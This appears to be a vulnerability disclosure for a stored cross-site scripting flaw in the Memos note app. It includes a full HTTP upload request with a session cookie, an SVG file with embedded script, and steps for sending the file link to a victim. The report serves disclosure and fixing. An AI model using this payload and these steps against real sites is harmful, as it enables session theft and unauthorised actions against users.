Description

When user upload a file with .svg extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing SVG as HTML file

Proof of Concept

POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
      alert(window.origin);
   // ]]>
  </script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--

Step to reproduce

1. Prepare a file xss.svg with content: <script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script>
2. Upload xss.svg file in Resource library -> Upload
3. Coppy Link file XSS send to victim

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...